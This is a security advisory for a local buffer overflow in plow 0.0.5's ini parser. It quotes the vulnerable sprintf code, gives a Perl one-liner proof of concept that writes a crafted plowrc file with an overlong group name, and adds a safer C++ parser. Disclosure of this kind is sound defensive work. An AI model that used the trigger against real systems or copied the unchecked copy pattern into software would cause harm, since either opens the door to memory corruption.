plow 0.0.5 <= Buffer Overflow Vulnerability

2012.07.05
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#################################################

plow 0.0.5 <= Buffer Overflow Vulnerability

#################################################

Discovered by: Jean Pascal Pereira <pereira () secbiz de>

Vendor information:

"plow is a command line playlist generator."

Vendor URI: http://developer.berlios.de/projects/plow/

#################################################

Risk-level: Medium

The application is prone to a local buffer overflow vulnerability.

-------------------------------------

IniParser.cpp, line 26:

26:    char buffer[length];
27:    char group [length];
28:
29:    char *option;
30:    char *value;
31:
32:    while(ini.getline(buffer, length)) {
33:      if(!strlen(buffer) || buffer[0] == '#') {
34:        continue;
35:      }
36:      if(buffer[0] == '[') {
37:        if(buffer[strlen(buffer) - 1] == ']') {
38:          sprintf(group, "%s", buffer);
39:        } else {
40:          err = 1;
41:          break;
42:        }
43:      }

-------------------------------------

Exploit / Proof Of Concept:

Create a crafted plowrc file:

perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc

-------------------------------------

Solution:

Do some input validation.

-------------------------------------

#################################################
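The "Solution" line above asks for input validation. As an added example (not plow's code and not from the advisory's author), this is one way to parse the same "[group]" / "option=value" layout in C++ without fixed-size stack buffers or sprintf. The names IniResult, parse_ini and parse_sample and the 1024-byte max_line limit are assumptions made for illustration.

```cpp
// Added example: hypothetical names, not plow's IniParser interface.
#include <cstddef>
#include <istream>
#include <map>
#include <sstream>
#include <string>

struct IniResult {
    bool ok = true;            // false on malformed or oversized input
    std::size_t bad_line = 0;  // 1-based number of the first rejected line
    std::map<std::string, std::map<std::string, std::string>> groups;
};

// Parse "[group]" headers and "option=value" pairs using std::string storage.
// max_line is an assumed policy limit, checked before a line is interpreted.
IniResult parse_ini(std::istream &ini, std::size_t max_line = 1024) {
    IniResult res;
    std::string line, group;
    std::size_t n = 0;
    while (std::getline(ini, line)) {
        ++n;
        if (line.empty() || line[0] == '#') continue;   // blank line or comment
        if (line.size() > max_line) {                   // reject, never truncate
            res.ok = false; res.bad_line = n; break;
        }
        if (line[0] == '[') {
            if (line.back() != ']') { res.ok = false; res.bad_line = n; break; }
            group = line.substr(1, line.size() - 2);    // string owns its storage
            res.groups[group];                          // register the group
            continue;
        }
        std::size_t eq = line.find('=');
        if (eq == std::string::npos || eq == 0) {       // missing '=' or empty key
            res.ok = false; res.bad_line = n; break;
        }
        res.groups[group][line.substr(0, eq)] = line.substr(eq + 1);
    }
    return res;
}

// Constructed sample input with the same shape as the crafted plowrc file:
// one group header of name_len 'A' characters followed by "A=B".
IniResult parse_sample(std::size_t name_len) {
    std::istringstream in("[" + std::string(name_len, 'A') + "]\nA=B");
    return parse_ini(in);
}
```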

References:

http://developer.berlios.de/projects/plow/



Copyright 2024, cxsecurity.com

 
